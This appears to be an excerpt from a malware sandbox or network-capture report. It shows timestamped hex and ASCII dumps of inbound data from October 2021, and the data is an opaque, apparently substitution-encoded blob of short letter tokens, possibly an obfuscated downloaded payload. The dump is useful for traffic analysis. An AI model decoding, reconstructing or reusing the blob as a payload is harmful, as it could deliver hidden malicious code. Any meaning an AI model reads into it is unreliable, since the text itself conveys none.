                                                  2021-10-29 18:30:02 UTC1732INData Raw: 4f 6f 78 20 4f 78 78 20 51 6b 20 6f 59 59 20 6f 6b 20 4b 6b 20 59 78 20 59 6f 20 4b 74 20 6b 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 51 4f 20 51 59 20 4f 51 6f 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 4f 59 20 6b 59 20 6f 6f 52 20 59 78 20 4b 6b 20 59 78 20 59 6f 20 4b 74 20 4f 78 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 59 45 20 59 52 20 4f 78 52 20 4f 6b 59 20 4f 78 78 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 4f 4f 20 6f 74 20 4b 6b 20 59 78 20 59 78 20 52 51 20 4f 6f 59 20 4f 78 52 20 51 74 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 4f 45 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 52 20 6b 6b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f
                                                  Data Ascii: Oox Oxx Qk oYY ok Kk Yx Yo Kt kR OOt OxQ OOR QO QY OQo YK kK Oox oOY kY ooR Yx Kk Yx Yo Kt Oxo OOt OxQ OOR YE YR OxR OkY Oxx OOK OOt OOO OO ot Kk Yx Yx RQ OoY OxR Qt oYE OxK Kk Yx YY OOE ORo OEY OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk oR kk kK OOK Oot OO
                                                  2021-10-29 18:30:02 UTC1736INData Raw: 4f 51 6f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 51 45 20 51 78 20 4f 4f 6f 20 59 78 20 59 6b 20 52 59 20 4f 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 45 78 20 59 78 20 4b 6b 20 59 52 20 59 6f 20 4b 74 20 51 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 45 59 20 59 6b 20 45 59 20 59 51 20 4f 6f 20 51 51 20 4f 6f 45 20 4f 6f 45 20 6f 45 78 20 4f 78 52 20 45 45 20 52 78 20 45 45 20 4f 51 4b 20 4b 6f 20 4f 78 78 20 51 51 20 4f 78 4b 20 4f 52 4b 20 4f 78 4b 20 45 59 20 59 52 20 74 74 20 6f 6f 6b 20 4b 59 20 4b 20 51 74 20 52 78 20 4b 6f 20 4f 52 4b 20 51 59 20 59 51 20 4f 6f 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 51 20 6f 4b 20 59 78 20 59 4b 20 6b 78 20 74 4b 20 6f 45 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 78 20 74 45 20 59 74 20 6b 4b 20 4f 4f 4b 20 4f
                                                  Data Ascii: OQo YK kK OOk QE Qx OOo Yx Yk RY OK kK OOK Oot RQ Ex Yx Kk YR Yo Kt Qk OOt OxQ OOR EY Yk EY YQ Oo QQ OoE OoE oEx OxR EE Rx EE OQK Ko Oxx QQ OxK ORK OxK EY YR tt ook KY K Qt Rx Ko ORK QY YQ Ook OOt OxQ Ooo tQ oK Yx YK kx tK oEY OxQ OOo Yx Yx tE Yt kK OOK O
                                                  2021-10-29 18:30:02 UTC1740INData Raw: 4f 4f 4b 20 4f 4f 52 20 4f 4f 59 20 4f 4f 4b 20 6f 52 20 6b 6f 20 59 78 20 59 4b 20 51 4b 20 6b 6b 20 51 51 20 4f 4f 78 20 4f 78 4b 20 6f 78 4b 20 4b 51 20 6f 4b 20 59 4b 20 6b 4b 20 4f 78 59 20 52 51 20 4f 78 4b 20 4f 4f 6f 20 52 74 20 4b 6b 20 59 78 20 59 4b 20 4f 4f 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 59 20 51 45 20 4f 59 45 20 59 4f 20 59 4b 20 6b 6f 20 4f 78 4f 20 6f 4b 6b 20 59 45 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 45 6f 20 45 6b 20 4f 74 6f 20 4f 4f 4b 20 4f 78 51 20 78 20 4f 4b 4b 20 45 51 20 51 45 20 4f 6f 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 45 20 45 20 59 4f 20 4b 51 20 59 78 20 52 78 20 6b 6f 20 4f 78 78 20 6f 45 51 20 4f 78 74 20 4f 78 45 20 4f 52 6b 20 6f 4b 20 6b 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 51 45 20 4f 4f
                                                  Data Ascii: OOK OOR OOY OOK oR ko Yx YK QK kk QQ OOx OxK oxK KQ oK YK kK OxY RQ OxK OOo Rt Kk Yx YK OOO OOK OOt OoK OOY QE OYE YO YK ko OxO oKk YE OOo Yx KQ oE Eo Ek Oto OOK OxQ x OKK EQ QE Oox kK OOK Oot OxE E YO KQ Yx Rx ko Oxx oEQ Oxt OxE ORk oK kO YK kK Oox QE OO
                                                  2021-10-29 18:30:02 UTC1744INData Raw: 78 51 20 51 4f 20 6f 45 20 6f 51 20 52 6f 20 4f 52 20 74 78 20 4f 4f 6f 20 4f 45 51 20 4f 6f 78 20 52 74 20 59 78 20 4b 6b 20 4b 4f 20 52 6f 20 4f 6f 74 20 59 51 20 4f 4f 20 4f 6f 45 20 4f 4f 45 20 59 78 20 59 6f 20 6f 45 20 6f 74 20 52 74 20 6b 4b 20 4f 4f 20 4f 6f 4f 20 4f 4f 45 20 59 78 20 59 6f 20 6f 78 4b 20 4b 6b 20 74 6f 20 4f 4f 6f 20 4f 4f 74 20 4f 78 74 20 45 20 4b 4f 20 4b 51 20 59 78 20 52 78 20 4f 4f 45 20 6f 4b 6f 20 51 51 20 4f 78 6b 20 4f 4f 6f 20 59 4b 20 6f 4b 20 4b 59 20 59 4b 20 6b 4b 20 6b 51 20 6b 78 20 52 4b 20 4f 6f 4b 20 6f 78 20 45 4b 20 4b 6b 20 6f 78 78 20 52 59 20 52 59 20 4f 4f 74 20 4f 78 51 20 4f 78 74 20 59 6b 20 6f 74 20 45 52 20 4b 6b 20 4f 74 78 20 4f 4f 52 20 4f 78 51 20 4f 4f 4f 20 4f 4f 6f 20 59 6f 20 52 74 20 4b 74
                                                  Data Ascii: xQ QO oE oQ Ro OR tx OOo OEQ Oox Rt Yx Kk KO Ro Oot YQ OO OoE OOE Yx Yo oE ot Rt kK OO OoO OOE Yx Yo oxK Kk to OOo OOt Oxt E KO KQ Yx Rx OOE oKo QQ Oxk OOo YK oK KY YK kK kQ kx RK OoK ox EK Kk oxx RY RY OOt OxQ Oxt Yk ot ER Kk Otx OOR OxQ OOO OOo Yo Rt Kt
                                                  2021-10-29 18:30:02 UTC1748INData Raw: 20 45 52 20 6f 52 20 4f 45 6b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 78 74 20 6b 59 20 45 74 20 45 51 20 45 6b 20 45 78 20 6f 45 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6f 4f 78 20 6f 45 20 4b 78 20 45 74 20 45 4b 20 4f 6f 4b 20 6f 78 52 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4f 4b 4b 20 6f 4f 20 4b 45 20 45 6f 20 52 4b 20 51 78 20 6f 78 4f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 4f 4b 52 20 6f 52 20 4f 45 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 4b 51 20 59 4f 20 4b 6b 20 59 52 20 4f 6b 6f 20 74 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 59 20 4f 4b 20 4b 74 20 4b 51 20 59 78 20 59 78 20 4b 74 20 4b 6b 20 4f 4f 52 20 4f 78 51 20 4f 6f 6f 20 74 52 20 4b 59 20 59 4f 20 59 4b 20 6b 78 20 4f 6f 6f 20 51 51 20 4f 6f 45 20 45 20 4f 4f 45 20 4b 51 20 59 78 20 52
                                                  Data Ascii: ER oR OEk kK OOK Oot oxt kY Et EQ Ek Ex oEo OOK OOt OxE oOx oE Kx Et EK OoK oxR OOt OxQ Ooo OKK oO KE Eo RK Qx oxO OxQ OOo YR OKR oR OEQ kK OOK Oot RQ KQ YO Kk YR Oko tE OOY OOt OxY OK Kt KQ Yx Yx Kt Kk OOR OxQ Ooo tR KY YO YK kx Ooo QQ OoE E OOE KQ Yx R
                                                  2021-10-29 18:30:02 UTC1752INData Raw: 4b 20 4f 4f 4b 20 74 6f 20 4f 78 51 20 59 78 20 74 74 20 4b 6b 20 4b 51 20 52 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 4f 4f 20 4f 4f 6f 20 6f 6b 20 4b 6b 20 4f 78 6b 20 4f 6b 52 20 6b 4b 20 4f 6f 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 78 20 59 78 20 4f 74 20 6b 4b 20 45 20 6f 45 74 20 4f 78 51 20 4f 6f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 52 20 4f 4f 4b 20 6b 59 20 4f 78 51 20 6f 4b 4b 20 4f 59 78 20 4b 6b 20 59 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 6b 20 4f 59 6f 20 4f 45 4b 20 6b 4b 20 4f 4f 45 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 45 20 6f 20 59 4f 20 6b 4b 20 4f 52 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 6f 4f 20 4b 6b 20 59 78 20 45 51 20 45 51 20 6f 4f 52 20 4f
                                                  Data Ascii: K OOK to OxQ Yx tt Kk KQ Rx kK OOK OOR OOO OOo ok Kk Oxk OkR kK Oox OOt OxQ OOo Yx Yx Yx Ot kK E oEt OxQ Ooo Yx Kk Yx YK kR OOK kY OxQ oKK OYx Kk YR YK kK OOK OOt OxQ OOo Yo Kk OYo OEK kK OOE Oot OxQ OOo YO KE o YO kK ORY OOt OxQ OOo OoO Kk Yx EQ EQ oOR O
                                                  2021-10-29 18:30:02 UTC1756INData Raw: 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4b 6b 20 59 78 20 4f 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 52 4b 20 4f 4f 45 20 59 78 20 4b 6b 20 6b 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 6b 20 59 78 20 59 4b 20 59 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 6f 20 59 4f 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 4f 6f 20 59 78 20 4b 51 20 4b 4f 20 52 20 6b 4f 20 4f 4f 4b 20 6f 4b 78 20 4f 4f 4f 20 4f 4f 6f 20 59 78 20 4f 6f 74 20 59 78 20 59 4b 20 52 51 20 4f 20 6f 4f 78 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 6b 20 4f 6b 20 4f 6b 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 6f
                                                  Data Ascii: K OOK OOt OxQ OOK Yx Kk Yx OY kK OOK OOt RK OOE Yx Kk kK YY kK OOK Oot OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yo Kk Yx YK YR OOY OOt OxQ o YO Kk Yx YE kK OOK OOt OxE OOo Yx KQ KO R kO OOK oKx OOO OOo Yx Oot Yx YK RQ O oOx OxQ OOo YR Yk Ok Okt kK OOK OOt o
                                                  2021-10-29 18:30:02 UTC1760INData Raw: 78 6b 20 4f 4f 6f 20 59 52 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 6f 20 4f 4f 74 20 45 52 20 4f 4f 6f 20 4f 74 6b 20 6f 4b 51 20 59 78 20 52 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 4f 4b 20 59 78 20 4f 52 59 20 4f 6f 51 20 4f 4f 4b 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 6f 20 4f 4f 4b 20 4f 74 4b 20 4f 4b 78 20 4f 4f 6f 20 4b 51 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 4b 20 4f 4f 6f 20 4f 78 6b 20 4b 51 20 59 78 20 59 4b 20 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 45 20 4f 4b 51 20 4b 6b 20 59 78 20 52 78 20 51 4b 20 4f 78 51 20 74 78 20 6f 6f 4b 20 4b 6f 20 59 78 20 4b 6b 20 59 4f 20 4f 51 20 4f 45 6f 20 4f 52 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 52
                                                  Data Ascii: xk OOo YR Kk Yx YK kK OOo OOt ER OOo Otk oKQ Yx Rx kK OOK OOt OxQ OOK Yx OOK Yx ORY OoQ OOK Oot OxQ OOo Yx Kk Yx YK ko OOK OtK OKx OOo KQ Yk Yx YK kY OxY RQ OxK OOo Oxk KQ Yx YK K OOK OOt OoK E OKQ Kk Yx Rx QK OxQ tx ooK Ko Yx Kk YO OQ OEo ORY OOt OxQ OOR
                                                  2021-10-29 18:30:02 UTC1764INData Raw: 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 6b 6b 20 4f 4f 6f 20 59 78 20 59 6b 20 59 6f 20 4b 4f 20 51 78 20 6f 59 59 20 4b 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 6f 4f 20 6f 6f 52 20 6f 4b 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 74 4f 20 59 78 20 4b 6b 20 59 52 20 52 51 20 4f 78 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 6f 6f 74 20 4b 6b 20 59 78 20 52 78 20 45 51 20 6f 4f 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 59 74 20 59 45 20 45 78 20 52 6f 20 6b 4f 20 6f 59 6f 20 6b 51 20 4f 78 59 20 4f 4f 52 20 4b 51 20 4f 20 4b 6b 20 4b 51 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 51 20 52 51 20 4f 52 6f 20 59 78 20 4b 6b 20 59 52 20 59 6b 20 52 52 20 4f 6f 74 20 74 74 20 4f 6f 4b 20 4f 4f 45 20 59 78 20 4b 6b 20 59 6b 20 52
                                                  Data Ascii: YR Rt Ox YK kK Oox oR Okk OOo Yx Yk Yo KO Qx oYY Kt OxQ OOo YO oO ooR oKY kK OOK OOE RQ tO Yx Kk YR RQ Oxk OOK OOt OxE EO oot Kk Yx Rx EQ oOE OOt OxQ Ooo Yt YE Ex Ro kO oYo kQ OxY OOR KQ O Kk KQ OoR OOK OOQ RQ ORo Yx Kk YR Yk RR Oot tt OoK OOE Yx Kk Yk R
                                                  2021-10-29 18:30:02 UTC1768INData Raw: 4f 4f 6f 20 59 78 20 59 6f 20 6f 4b 20 6f 78 20 6b 52 20 4f 4f 45 20 6b 20 51 4b 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 4b 20 4b 78 20 6b 52 20 51 20 52 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 52 20 4f 52 20 59 6f 20 6b 74 20 4f 59 20 52 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 52 20 4b 4b 20 59 6f 20 4b 74 20 74 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 4b 20 4f 6b 20 4b 6b 20 59 45 20 4b 4f 20 74 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 4b 20 4b 52 20 4b 6b 20 74 74 20 51 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 51 78 20 4f 52 20 59 78 20 4b 51 20 74 59 20 51 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 51 78 20 4b 4b 20 59 78 20 74 45 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 74 4f 20 6b 6f 20 4b 6b 20 59 4f 20 74 51 20 4f 20 6b 4b 20 4f 4f 4b 20
                                                  Data Ascii: OOo Yx Yo oK ox kR OOE k QK OOo Yx Yo oK Kx kR Q RY OxQ OOo YK oR OR Yo kt OY RY OxQ OOo YK oR KK Yo Kt tO OOt OxQ OOR oK Ok Kk YE KO tO OOt OxQ OOR oK KR Kk tt Qk OOK OOt OxY Qx OR Yx KQ tY Qk OOK OOt OxY Qx KK Yx tE O kK OOK OOE tO ko Kk YO tQ O kK OOK
                                                  2021-10-29 18:30:02 UTC1772INData Raw: 59 4b 20 6b 78 20 4f 4f 6f 20 51 45 20 4f 59 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 4b 20 4b 78 20 6b 52 20 51 20 51 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 52 20 4f 52 20 59 6f 20 6b 74 20 4f 59 20 51 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 52 20 4b 4b 20 59 6f 20 4b 74 20 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 4b 20 4f 6b 20 4b 6b 20 59 45 20 4b 4f 20 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 4b 20 4b 52 20 4b 6b 20 74 74 20 4b 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 51 78 20 4f 52 20 59 78 20 4b 51 20 74 59 20 4b 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 51 78 20 4b 4b 20 59 78 20 6f 52 20 6b 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 74 4f 20 4f 4f 78 20 4b 6b 20 74 59 20 74 74 20 59 4b 20 6b 4b 20 4f 4f 6b 20 51 59 20 74 51 20 4f 4f 4b 20 4b
                                                  Data Ascii: YK kx OOo QE OY OOo Yx Yk oK Kx kR Q Q OxQ OOo YK oR OR Yo kt OY Q OxQ OOo YK oR KK Yo Kt OY OOt OxQ OOR oK Ok Kk YE KO OY OOt OxQ OOR oK KR Kk tt Ko OOK OOt OxY Qx OR Yx KQ tY Ko OOK OOt OxY Qx KK Yx oR kK kK OOK Oot tO OOx Kk tY tt YK kK OOk QY tQ OOK K
                                                  2021-10-29 18:30:02 UTC1776INData Raw: 74 20 59 45 20 51 59 20 59 74 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 52 51 20 4f 74 51 20 4f 4f 59 20 6f 78 20 6f 45 6b 20 59 78 20 45 52 20 6b 52 20 51 78 20 6f 4f 59 20 4f 78 6b 20 4f 4f 6f 20 59 52 20 4f 78 20 4f 6f 78 20 6f 78 4f 20 4f 74 4f 20 4f 4b 4f 20 4f 74 4f 20 51 51 20 51 6b 20 4b 6b 20 6f 78 52 20 45 52 20 4f 4f 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 78 20 6f 20 4f 6f 45 20 59 78 20 4b 6b 20 59 52 20 6f 45 4b 20 6b 52 20 4f 20 6f 45 6b 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 45 59 20 59 6b 20 45 51 20 51 6f 20 51 78 20 51 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 59 20 51 45 20 4f 74 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 78 20 59 78 20 4b 6b 20 59 52 20 6b 51 20 6f 4b 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 74 20 59 6b 20 4b 74 20 6f 78 20 4f 6b
                                                  Data Ascii: t YE QY Yt YK kK Oox ORQ OtQ OOY ox oEk Yx ER kR Qx oOY Oxk OOo YR Ox Oox oxO OtO OKO OtO QQ Qk Kk oxR ER OOK kK OOK OOx o OoE Yx Kk YR oEK kR O oEk Oxk OOo Yo EY Yk EQ Qo Qx Q OxQ OOo YR YY QE Ott kK OOK Oot o x Yx Kk YR kQ oKR OOY OOt Oxt Qt Yk Kt ox Ok
                                                  2021-10-29 18:30:02 UTC1780INData Raw: 20 4f 51 45 20 4f 4f 51 20 4f 4f 6b 20 59 78 20 45 78 20 59 4b 20 4f 45 78 20 74 6b 20 4f 4f 52 20 4f 4f 74 20 74 74 20 4f 4f 52 20 4f 45 4b 20 4b 6f 20 6f 51 20 59 4b 20 6f 4f 59 20 74 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 59 78 20 6f 59 4f 20 6f 51 20 51 45 20 4f 6f 78 20 4f 4f 52 20 4f 4f 74 20 74 51 20 6b 6f 20 6b 51 20 6f 6b 20 59 6f 20 59 4b 20 4f 45 4b 20 4f 4f 45 20 45 78 20 52 59 20 4f 4f 6b 20 59 78 20 4f 4b 78 20 59 6f 20 51 45 20 4f 6f 78 20 4f 4f 52 20 4f 4f 74 20 6f 6f 20 6b 59 20 4f 4b 51 20 59 20 52 78 20 59 4b 20 6f 6f 4b 20 52 74 20 4f 74 78 20 74 78 20 4f 4f 6b 20 59 78 20 6f 78 4b 20 4f 20 74 6f 20 4f 4f 78 20 4f 4f 52 20 4f 4f 74 20 6f 59 6f 20 6b 78 20 6b 51 20 6f 6b 20 52 78 20 59 4b 20 4f 74 74 20 4f 78 51 20 4f 74 78 20 74 78
                                                  Data Ascii: OQE OOQ OOk Yx Ex YK OEx tk OOR OOt tt OOR OEK Ko oQ YK oOY tx OOt OxQ OOk Yx oYO oQ QE Oox OOR OOt tQ ko kQ ok Yo YK OEK OOE Ex RY OOk Yx OKx Yo QE Oox OOR OOt oo kY OKQ Y Rx YK ooK Rt Otx tx OOk Yx oxK O to OOx OOR OOt oYo kx kQ ok Rx YK Ott OxQ Otx tx
                                                  2021-10-29 18:30:02 UTC1784INData Raw: 6f 59 20 4f 4f 6f 20 51 59 20 6f 20 59 78 20 59 4b 20 4f 78 4b 20 4f 4f 4b 20 4f 6f 4b 20 4f 78 51 20 6f 45 20 59 78 20 4b 51 20 59 4f 20 59 4b 20 6b 4b 20 4f 52 45 20 74 45 20 4f 78 51 20 4f 4f 6f 20 51 59 20 4b 6b 20 59 51 20 59 4b 20 6f 4f 45 20 4f 4f 4b 20 6f 4b 4b 20 4f 78 51 20 51 52 20 59 78 20 4f 74 52 20 4f 74 20 59 4b 20 6b 4b 20 51 4f 20 4f 4f 74 20 4f 78 78 20 4f 4f 6f 20 4f 6b 45 20 4b 6b 20 4f 74 51 20 59 59 20 52 6b 20 4f 4f 4b 20 74 6b 20 4b 52 20 4f 4f 6f 20 59 78 20 6f 59 20 59 78 20 52 4f 20 6b 4b 20 6f 4b 51 20 4f 4f 74 20 6f 45 52 20 4f 4f 45 20 45 4b 20 4b 6b 20 4f 52 6f 20 74 20 6b 4b 20 4f 4f 4b 20 51 6f 20 4f 78 51 20 4f 6f 45 20 59 78 20 4f 6b 6b 20 59 78 20 4f 6b 45 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 52 78 20 6b 6b 20 59 78 20
                                                  Data Ascii: oY OOo QY o Yx YK OxK OOK OoK OxQ oE Yx KQ YO YK kK ORE tE OxQ OOo QY Kk YQ YK oOE OOK oKK OxQ QR Yx OtR Ot YK kK QO OOt Oxx OOo OkE Kk OtQ YY Rk OOK tk KR OOo Yx oY Yx RO kK oKQ OOt oER OOE EK Kk ORo t kK OOK Qo OxQ OoE Yx Okk Yx OkE kY Qk OOt ORx kk Yx
                                                  2021-10-29 18:30:02 UTC1788INData Raw: 6b 20 59 78 20 4f 4f 4f 20 6b 59 20 6b 52 20 4f 4f 52 20 74 6f 20 4f 4f 4b 20 45 45 20 4b 51 20 59 78 20 59 4b 20 4f 78 20 4f 6f 45 20 4f 4f 74 20 4f 78 51 20 4b 4f 20 59 4f 20 6f 78 20 59 4f 20 4f 51 20 6b 52 20 51 74 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 74 4f 20 52 45 20 59 78 20 59 4b 20 4f 45 20 4f 4f 59 20 6b 4f 20 4f 78 6b 20 6b 59 20 4b 6b 20 45 59 20 59 4f 20 59 4b 20 6b 4b 20 6f 4b 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 78 74 20 4b 51 20 6f 6f 20 59 59 20 4f 4f 45 20 4f 4f 6f 20 4f 78 6f 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 59 45 20 59 59 20 59 4b 20 6b 4b 20 4b 45 20 4f 4f 52 20 74 45 20 4f 4f 45 20 6f 45 20 59 78 20 45 45 20 59 59 20 6b 4b 20 4f 4f 4b 20 6f 45 4f 20 51 6b 20 4f 4f 6f 20 59 78 20 4f 78 59 20 59 4f 20 4f 6b 20 6b 59 20 6b
                                                  Data Ascii: k Yx OOO kY kR OOR to OOK EE KQ Yx YK Ox OoE OOt OxQ KO YO ox YO OQ kR Qt OOR OxQ OOo tO RE Yx YK OE OOY kO Oxk kY Kk EY YO YK kK oKR OOt OxQ OOo Oxt KQ oo YY OOE OOo Oxo Oxk OOo Yx YE YY YK kK KE OOR tE OOE oE Yx EE YY kK OOK oEO Qk OOo Yx OxY YO Ok kY k
                                                  2021-10-29 18:30:02 UTC1792INData Raw: 6f 45 51 20 45 6f 20 59 4f 20 59 4b 20 4f 6b 6b 20 4f 78 59 20 6f 4f 4f 20 4f 78 51 20 4f 4f 45 20 59 78 20 45 59 20 4b 52 20 4f 4b 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 6b 45 20 4f 78 6b 20 59 6f 20 45 45 20 59 4f 20 59 4b 20 45 52 20 4f 4f 4f 20 4f 78 20 4f 6f 4b 20 4f 4f 45 20 59 78 20 4f 6b 52 20 4b 74 20 4f 4b 4b 20 6b 4b 20 52 59 20 4f 4f 52 20 6f 6f 6f 20 4f 6f 52 20 4f 6b 6f 20 45 45 20 4f 20 59 59 20 4f 6f 20 51 6b 20 6f 59 6f 20 4f 6f 4b 20 52 74 20 59 4f 20 52 4b 20 45 6b 20 4f 74 6b 20 52 51 20 52 59 20 4f 4f 52 20 4f 4f 78 20 4f 4f 51 20 4f 6b 6b 20 45 45 20 4f 20 59 59 20 4f 74 4b 20 4f 6f 74 20 6f 45 78 20 4f 6f 4b 20 52 74 20 59 4f 20 4f 51 52 20 59 52 20 4f 74 4b 20 52 51 20 52 59 20 4f 4f 52 20 6f 45 4f 20 4f 6f 52 20 4f 74 59 20 45 45
                                                  Data Ascii: oEQ Eo YO YK Okk OxY oOO OxQ OOE Yx EY KR OKK kK OOY OOt kE Oxk Yo EE YO YK ER OOO Ox OoK OOE Yx OkR Kt OKK kK RY OOR ooo OoR Oko EE O YY Oo Qk oYo OoK Rt YO RK Ek Otk RQ RY OOR OOx OOQ Okk EE O YY OtK Oot oEx OoK Rt YO OQR YR OtK RQ RY OOR oEO OoR OtY EE
                                                  2021-10-29 18:30:02 UTC1796INData Raw: 20 51 59 20 4f 4f 74 20 4f 59 20 74 45 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 4f 74 6b 20 4f 4f 59 20 4f 74 74 20 74 6b 20 4f 4f 45 20 59 78 20 52 20 59 78 20 6b 6f 20 4f 78 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 52 4b 20 4b 6b 20 4f 51 74 20 51 20 4f 6b 78 20 51 74 20 52 74 20 4f 78 51 20 4f 51 6f 20 4f 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 6f 6f 74 20 4f 4f 74 20 4f 59 4b 20 74 51 20 6f 4f 45 20 45 59 20 4f 78 20 59 4b 20 4f 6f 20 74 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 74 74 20 59 78 20 6b 74 20 4f 78 59 20 4f 45 78 20 4f 78 6f 20 6b 74 20 4f 4f 6f 20 4f 4b 20 4f 4f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6f 4b 4b 20 4f 78 51 20 6f 6f 6f 20 6f 4f 20 6f 78 74 20 45 45 20 51 20 6b 4b 20 4f 4b 20 74 6b 20 4f 78 51
                                                  Data Ascii: QY OOt OY tE Yx Kk Yx YK Otk OOY Ott tk OOE Yx R Yx ko OxQ OOK OOt OxQ OOo ORK Kk OQt Q Okx Qt Rt OxQ OQo OO Kk Yx YK kK oot OOt OYK tQ oOE EY Ox YK Oo to OOt OxQ OOo Yx Ott Yx kt OxY OEx Oxo kt OOo OK OO Yx YK kK OOK oKK OxQ ooo oO oxt EE Q kK OK tk OxQ
